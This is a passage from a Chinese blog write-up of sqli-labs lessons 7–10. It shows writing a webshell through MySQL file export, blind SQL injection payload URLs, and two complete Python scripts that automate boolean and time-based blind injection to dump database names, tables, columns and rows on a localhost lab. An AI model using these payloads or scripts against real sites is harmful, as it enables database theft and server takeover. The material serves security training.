class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">前提是要获取到网站的绝对路径，这里可以使用这两个函数来辅助获取路径  </span><br><span class="line">&gt;@@datadir  读取数据库路径  </span><br><span class="line">&gt;@@basedir  mysql安装路径  </span><br><span class="line"></span><br><span class="line">首先猜测列数：  </span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/69E27EFDB515450EA7AE3003BE4B555B/6052)</span><br><span class="line"></span><br><span class="line">由于less-7无法输出，我们调至less-1来进行输出，将2,3改为@@datadir,@@basedir:  </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/799147DA1B9E42B0A5CFD6F7A0B81931/6055)  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">我们在mysql命令行中测试一下文件导出语句：  </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/18B46E7413424C458BB731635A392ABA/5127)  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">发现出现了错误，此时我们需要再mysql.ini中加入一句secure_file_priv=&quot;&quot;   </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/EE89E5F059B24E90BC1BEAA67D6BBA0C/5129)  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">执行成功，查看一下内容，发现已经写入。   </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/14FF442F4BFB4F9CB34E3B1D9FBC6779/5131)</span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/AE926872FA114FD5AB8BDA74716C5767/5133)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">接着我们来将一句话导入：  </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/396B0BB717314AC4AF0C484BDD7EAC44/5142)  </span><br><span class="line"></span><br><span class="line">虽然报出错误但是不影响文件的生成，接着就是上彩刀连接了：  </span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/A7A42D1817FB4AF9A43F2A1B922C765E/5137)  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/0D1B26952F0E4588A939733920EF239A/5147)   </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/B7B1F241847843ECBABF0C12C1F868A3/5150)   </span><br><span class="line"></span><br><span class="line">### 接下来进入盲注篇章  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">盲注需要掌握一些MySQL的相关函数：</span><br><span class="line">length(str)：返回str字符串的长度。   </span><br><span class="line"></span><br><span class="line">如执行select length(database())则会返回当前数据库名称的长度。而单独select database()则回返回当前数据库的名称。   </span><br><span class="line"></span><br><span class="line">substr(str, pos, len)：从pos位置取出str字符串的len个字符。如select substring(&apos;abcde&apos;, 4, 2)则返回de，pos为负则倒数pos个位置，如select substring(&apos;abcde&apos;, -4, 2);返回bc。    </span><br><span class="line"></span><br><span class="line">mid(str,pos,len):跟上面的一样，截取字符串</span><br><span class="line"></span><br><span class="line">ASCII(str)：返回字符串str的最左面字符的ASCII代码值。如果str是空字符串，返回0。如果str是NULL，返回NULL。如select ASCII(&apos;a&apos;)返回97。  </span><br><span class="line"></span><br><span class="line">将上面几个函数组合一下就有布尔值出现。如Select ascii(substr(database(),2,1)) = 101;当database()即当前数据库的名称中，正数第二个字符为e，则会返回1，当为其他字符时会返回0。逐级替换2为其他数字，就可以逐字猜数据库名称了。其中的＝号还可以换成&lt;或者&gt;。  </span><br><span class="line"></span><br><span class="line">if ((exp1, exp2, exp3)：为条件判断语句。当exp1的值为true时候，返回exp2，否则返回exp3。如  select if ((select database())=&apos;secur&apos;,sleep(10),null)即为判断当当前数据库的名字为secur的时候，MySQL会休眠10秒。  </span><br><span class="line"></span><br><span class="line">MySQL的主要内置表和字段信息：  </span><br><span class="line"></span><br><span class="line">information_schema 库的 TABLES 表，  </span><br><span class="line">主要字段分别是：  </span><br><span class="line"></span><br><span class="line">TABLE_SCHEMA : 数据库名  </span><br><span class="line"></span><br><span class="line">TABLE_NAME：表名    </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">盲注步骤：  </span><br><span class="line"></span><br><span class="line">(GET-盲注-布尔型-单引号)  </span><br><span class="line"></span><br><span class="line">1.构造SQL语句猜测当前数据库的名称：</span><br></pre></td></tr></table></figure></p>
<p>../index.php?id=1’ and (ascii(substr((select database()),1,1))=115)–+<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">借助“&lt;”，“&gt;”进行二分法判断，逐渐缩小范围，改变字母的位置，猜对后逐渐扩大  </span><br><span class="line"></span><br><span class="line">2.猜出数据库名称后测试基于时间的盲注漏洞</span><br><span class="line">语句：</span><br></pre></td></tr></table></figure></p>
<p>../index.php?id=1’ and if ((select database()=”security”),sleep(10),null)–+<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">若猜测正确，则会等待响应10秒钟  </span><br><span class="line"></span><br><span class="line">3.猜测表的数量：  </span><br><span class="line"></span><br><span class="line">语句：</span><br></pre></td></tr></table></figure></p>
<p>../index.php?id=1’ and if(((select count(table_name) from information_schema,tables where table_schema=databaes())=4),sleep(10),null)–+<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"> </span><br><span class="line"></span><br><span class="line">4.构造语句猜测表名：</span><br></pre></td></tr></table></figure></p>
<p>../index.php?id=1” and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),null)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">*构造语句中limit是mysql的语法  </span><br><span class="line"></span><br><span class="line">select * from tablename limit 0,1即取出第一条记录  </span><br><span class="line"></span><br><span class="line">select * from tablename limit 1,1取出第二条记录  </span><br><span class="line"></span><br><span class="line">select * from tablename limit 10,20从第11条到30条（共计20条）   </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">### less 8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)   </span><br><span class="line"></span><br><span class="line">在这里，输入正确，返回结果是会出现You are in...，而其他情况则不出现，我们可以利用这一点来判断我们的输入来判断是否正确：  </span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/754A8219A7B947649D190348FB9ECA6B/6151)  </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/4A86B85FD94549249C2AC59C360B83D3/6185)</span><br><span class="line"></span><br><span class="line">先来个猜测数据名的第一个字母作为示范：</span><br></pre></td></tr></table></figure></p>
<p><a href="http://localhost/sqli-labs/Less-8/?id=1&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-8/?id=1&#39;</a> and ascii(substr((select database()),1,1))&gt;=110 %23  返回正确，说明第一个字母的ascii码大于110  </p>
<p><a href="http://localhost/sqli-labs/Less-8/?id=1&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-8/?id=1&#39;</a> and ascii(substr((select database()),1,1))&gt;=118 %23  返回错误，说明一个字母的ascii码小于118，在区间110~118  </p>
<p><a href="http://localhost/sqli-labs/Less-8/?id=1&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-8/?id=1&#39;</a> and ascii(substr((select database()),1,1))&gt;=114 %23  返回正确，说明一个字母的ascii码大于等于114，在区间114~118  </p>
<p><a href="http://localhost/sqli-labs/Less-8/?id=1&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-8/?id=1&#39;</a> and ascii(substr((select database()),1,1))&gt;=116 %23  返回错误，说明第一个字母的ascii码小于116  </p>
<p><a href="http://localhost/sqli-labs/Less-8/?id=1&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-8/?id=1&#39;</a> and ascii(substr((select database()),1,1))&gt;=115 %23  返回正确，说明第一个字母的ascii码大于等于115，但小于116，说明该正确的ascii码为115，结果为’s’  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">上面就是布尔盲注的原理了，但是通过手工太消耗时间了，附上盲注脚本：</span><br></pre></td></tr></table></figure>
<h1 id="coding-utf-8"><a href="#coding-utf-8" class="headerlink" title="coding=utf-8"></a>coding=utf-8</h1><p>import urllib</p>
<p>search_str = “You are in”<br>database = “database()”<br>lengthdatabase = “‘ and length(%s)&gt;=%d #”<br>TableCountpayload = “‘and (select count(table_name) from information_schema.tables where table_schema=’%s’)&gt;=%d #”<br>asciiPayload = “‘ and ascii(substr((%s),%d,1))&gt;=%d #”</p>
<p>selectdatabse = “select database()”<br>selectTable = “select table_name from information_schema.tables where table_schema=’%s’  limit %d,1”</p>
<p>selectTableLength = “‘ and (select length(table_name) from information_schema.tables where table_schema=’%s’ limit “<br>selectTableLengthRight = “,1)&gt;=%d #”</p>
<p>url = “<a href="http://localhost/sqli-labs/Less-8/?id=1&quot;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-8/?id=1&quot;</a></p>
<p>def lengthString(payLoad, string):<br>    leftLenght = 0<br>    rightLenght = 0<br>    guess = 10<br>    while 1:<br>        if getLengthResult(payLoad, string, guess) == True:<br>            guess += 5<br>        else:<br>            rightLenght = guess<br>            break</p>
<pre><code># print rightLenght
mid = (leftLenght + rightLenght) / 2
while leftLenght &lt; rightLenght - 1:
    if getLengthResult(payLoad, string, mid) == True:
        leftLenght = mid
        mid = (leftLenght + rightLenght) / 2
    else:
        rightLenght = mid
        mid = (leftLenght + rightLenght) / 2
return leftLenght
</code></pre><p>def getLengthResult(payLoad, string, Lenght):<br>    Finalurl = url + urllib.quote(payLoad % (string, Lenght))<br>    rs = urllib.urlopen(Finalurl)<br>    if search_str in rs.read():<br>        return True<br>    else:<br>        return False</p>
<p>def getName(payload, string, Length):<br>    tmp = ‘’<br>    for i in xrange(1, Length + 1):<br>        leftLenght = 32<br>        rightLenght = 127<br>        mid = (leftLenght + rightLenght) / 2<br>        while leftLenght &lt; rightLenght - 1:<br>            if getResult(payload, string, i, mid) == True:<br>                leftLenght = mid<br>            else:<br>                rightLenght = mid<br>            mid = (leftLenght + rightLenght) / 2<br>        tmp += chr(leftLenght)</p>
<pre><code># print tmp
return tmp
</code></pre><p>def getResult(payload, string, pos, ascii):<br>    Finalurl = url + urllib.quote(payload % (string, pos, ascii))<br>    rs = urllib.urlopen(Finalurl)<br>    if search_str in rs.read():<br>        return True<br>    else:<br>        return False</p>
<p>def start():<br>    getDBLength = lengthString(lengthdatabase, database)<br>    print “length of DBname: “ + str(getDBLength)<br>    DBName = getName(asciiPayload, database, getDBLength)<br>    print “current database:” + DBName</p>
<pre><code>print TableCountpayload
tableCount = lengthString(TableCountpayload, DBName)
print &quot;count of table: &quot; + str(tableCount)

for i in xrange(0, tableCount):
    num = str(i)
    selectTableLengthPayload = selectTableLength + num + selectTableLengthRight
    tableNameLength = lengthString(selectTableLengthPayload, DBName)
    #print &quot;current table length:&quot; + str(tableNameLength)

    selectTableName = selectTable % (DBName, i)
    tableName = getName(asciiPayload, selectTableName, tableNameLength)
    print tableName

ColumnCountPayload = &quot;&apos; and (select count(column_name) from information_schema.columns where table_schema=&apos;&quot; + DBName + &quot;&apos; and table_name=&apos;%s&apos;)&gt;=%d #&quot;
getTable = raw_input(&quot;输入需要查询的列的表名：&quot;)
# 获取指定表的列数量
columnCount = lengthString(ColumnCountPayload, getTable)
print &quot;table:&quot; + getTable + &quot;--count  of column:&quot; + str(columnCount)

# 获取指定表的行数量
dataCountPayload = &quot;&apos; and (select count(*) from %s)&gt;=%d #&quot;
dataCount = lengthString(dataCountPayload, getTable)
print &quot;table:&quot; + getTable + &quot;--count of data: &quot; + str(dataCount)

data = []
# 获取指定表中的列
for i in xrange(0, columnCount):
    columnLengthPayload = &quot;&apos; and (select length(column_name) from information_schema.columns where table_schema=&apos;&quot; + DBName + &quot;&apos; and table_name=&apos;%s&apos; limit &quot; + str(
        i) + &quot;,1)&gt;=%d #&quot;
    #print columnLengthPayload
    columnNameLength = lengthString(columnLengthPayload, getTable)
    #print &quot;current column length:&quot; + str(columnNameLength)
    # 获取列名
    selectColumn = &quot;select column_name from information_schema.columns where table_schema=&apos;&quot; + DBName + &quot;&apos; and table_name=&apos;%s&apos; limit %d,1&quot;
    selectColumnName = selectColumn % (getTable, i)
    #print selectColumnName
    columnName = getName(asciiPayload, selectColumnName, columnNameLength)
    print &quot;current column_name: &quot; + columnName

    tmpData = []
    tmpData.append(columnName)

    for j in xrange(0, dataCount):
        columnDataLengthPayload = &quot;&apos; and (select length(&quot; + columnName + &quot;) from %s limit &quot; + str(j) + &quot;,1)&gt;=%d #&quot;
        #print columnDataLengthPayload
        columnDataLength = lengthString(columnDataLengthPayload, getTable)
       # print &quot;current columnData length: &quot; + str(columnDataLength)
        selectData = &quot;select &quot; + columnName + &quot; from &quot; + getTable + &quot; limit &quot; + str(j) + &quot;,1&quot;
        columnData = getName(asciiPayload, selectData, columnDataLength)
        #print &quot;current columnData: &quot; + columnData
        tmpData.append(columnData)

    data.append(tmpData)


tmp = &quot;&quot;
for i in xrange(0, len(data)):
    tmp += data[i][0] + &quot; &quot;
print tmp

for j in xrange(1, dataCount + 1):
    tmp = &quot;&quot;
    for i in xrange(0, len(data)):
        tmp += data[i][j] + &quot; &quot;
    print tmp
</code></pre><p>if <strong>name</strong> == ‘<strong>main</strong>‘:<br>    start()</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">获取到的结果为(代码输出完整的结果需要等一段时间哦）：  </span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/1A151F04731044FE9639A21C86CF96B3/6196)  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">### less 9 GET - Blind - Time based. -  Single Quotes  (基于时间的GET单引号盲注)  </span><br><span class="line"></span><br><span class="line">给出payload语句：</span><br></pre></td></tr></table></figure>
<p><a href="http://localhost/sqli-labs/Less-8/?id=1&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-8/?id=1&#39;</a> and if(ascii(substr((select database()),1,1))=114,sleep(5),null) %23  错误  </p>
<p><a href="http://localhost/sqli-labs/Less-8/?id=1&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-8/?id=1&#39;</a> and if(ascii(substr((select database()),1,1))=115,sleep(5),null) %23  正确，sleep了5秒<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line">基于时间的盲注脚本，可以在布尔盲注的基础上修改来获取完整的内容，我这里就先写了爆出数据库名，风格大体相同，做了点小改动：</span><br></pre></td></tr></table></figure></p>
<h1 id="coding-utf-8-1"><a href="#coding-utf-8-1" class="headerlink" title="coding=utf-8"></a>coding=utf-8</h1><p>import requests<br>import urllib<br>import time</p>
<p>url = “<a href="http://localhost/sqli-labs/Less-9/?id=1&quot;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-9/?id=1&quot;</a><br>database = “database()”<br>lengthdatabase = “‘ and if((length({0})&gt;={1}),sleep(5),null) #”<br>getDBName = “‘ and if(ascii(substr(({0}),{1},1))&gt;={2},sleep(5),null) #”</p>
<p>def LengthString(payload, string):<br>    left = 0<br>    right = 0<br>    guess = 10<br>    while 1:<br>        if LengthResult(payload, string, guess):<br>            guess += 5<br>        else:<br>            right = guess<br>            break</p>
<pre><code>mid = (left + right) / 2
while left &lt; right - 1:
    if LengthResult(payload, string, mid):
        left = mid
    else:
        right = mid
    mid = (left + right) / 2

return left
</code></pre><p>def LengthResult(payload, string, length):<br>    Finalurl = url + urllib.quote(payload.format(string, length))</p>
<pre><code># Finalurl = url + urllib.quote(payload % (string, pos, ascii))
# print Finalurl
startTime = time.time()
response = requests.get(Finalurl)
if time.time() - startTime &gt;= 5:
    return True
else:
    return False
</code></pre><p>def getName(payload, string, length):<br>    tmp = ‘’<br>    for i in xrange(1, length + 1):<br>        left = 96<br>        right = 126<br>        mid = (left + right) / 2<br>        while left &lt; right - 1:<br>            if getNameResult(payload, string, i, mid):<br>                left = mid<br>            else:<br>                right = mid<br>            mid = (left + right) / 2<br>        tmp += chr(mid)<br>        print tmp<br>    return tmp</p>
<p>def getNameResult(payload, string, pos, ascii):<br>    Finalurl = url + urllib.quote(payload.format(string, pos, ascii))</p>
<pre><code># print Finalurl
startTime = time.time()
response = requests.get(Finalurl)
if time.time() - startTime &gt;= 5:
    return True
else:
    return False
</code></pre><p>if <strong>name</strong> == ‘<strong>main</strong>‘:<br>    getDBLength = LengthString(lengthdatabase, database)<br>    print “The current DBlength:” + str(getDBLength)<br>    DBName = getName(getDBName, database, getDBLength)<br>    print “The current DBName:” + DBName<br><code>`</code></p>
<p>运行脚本得到数据库名结果：  </p>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/5FBEAEECACA143C8A03B0206CB86FF7A/6223" alt="">  </p>
<h3 id="less-10-GET-Blind-Time-based-double-quotes-基于时间的双引号盲注"><a href="#less-10-GET-Blind-Time-based-double-quotes-基于时间的双引号盲注" class="headerlink" title="less 10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)"></a>less 10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)</h3><p>把上面的改成双引号就行</p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2018/11/26/sqli-lab(1-10)(1)/"></a></p>
        <p><span>文章作者:</span><a href="/" title="访问 Star_Cheng 的个人博客">Star_Cheng</a></p>
        <p><span>发布时间:</span>2018年11月26日 - 16时56分</p>
        <p><span>最后更新:</span>2018年07月30日 - 14时03分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2018/11/26/sqli-lab(1-10)(1)/" title="">http://yoursite.com/2018/11/26/sqli-lab(1-10)(1)/</a>
            <span class="copy-path" data-clipboard-text="原文: http://yoursite.com/2018/11/26/sqli-lab(1-10)(1)/　　作者: Star_Cheng" title=""></span>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target="_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
  
    <a href="/2018/11/01/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">Hello World</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>


  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-level-1-GET-Error-based-Single-quotes-String-基于错误的GET单引号字符型注入"><span class="toc-number">1.</span> <span class="toc-text">1.level-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入"><span class="toc-number">2.</span> <span class="toc-text">2.less-2 GET - Error based - Intiger based (基于错误的GET整型注入)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入"><span class="toc-number">3.</span> <span class="toc-text">3.less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)</span></a></li></ol><li class="toc-item toc-level-1"><a class="toc-link" href="#coding-utf-8"><span class="toc-number"></span> <span class="toc-text">coding=utf-8</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#coding-utf-8-1"><span class="toc-number"></span> <span class="toc-text">coding=utf-8</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#less-10-GET-Blind-Time-based-double-quotes-基于时间的双引号盲注"><span class="toc-number">1.</span> <span class="toc-text">less 10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)</span></a></li></ol>
</li></div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>
<input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";
    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>




<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>




    
        <section class="changyan" id="comments">
  <!--<div id="uyan_frame"></div>-->
  <div id="SOHUCS"></div>
  <script charset="utf-8" type="text/javascript" src="https://changyan.sohu.com/upload/changyan.js"></script>
  <script type="text/javascript">
    window.changyan.api.config({
      appid: 'xxxx',
      conf: 'xxxxxxxxx'
    });
  </script>
</section>
    



    <div class="scroll" id="post-nav-button">
        
            <a href="/" title="回到主页"><i class="fa fa-home"></i></a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2018/11/01/hello-world/" title="下一篇: Hello World">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2018/11/26/sqli-lab(1-10)(1)/">sqli-lab(1-10)(1)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/01/hello-world/">Hello World</a></li></ul>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

    <script>
        $(".post-list").addClass("toc-article");
        // $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#toc, .switch-btn, .switch-area").toggle();
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
                $(".switch-btn, .switch-area").fadeToggle(300);
            }
        })
    </script>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2018 Star_Cheng
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo &nbsp;&nbsp;</a><a href="https://github.com/maochunguang" target="_blank">Blog</a> by tommy
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit">极客到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 1;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>


<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'xxxxx', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->



	<script>
	var _hmt = _hmt || [];
	(function() {
	  var hm = document.createElement("script");
	  hm.src = "//hm.baidu.com/hm.js?xxxxxx";
	  var s = document.getElementsByTagName("script")[0]; 
	  s.parentNode.insertBefore(hm, s);
	})();
	</script>



<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(
            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>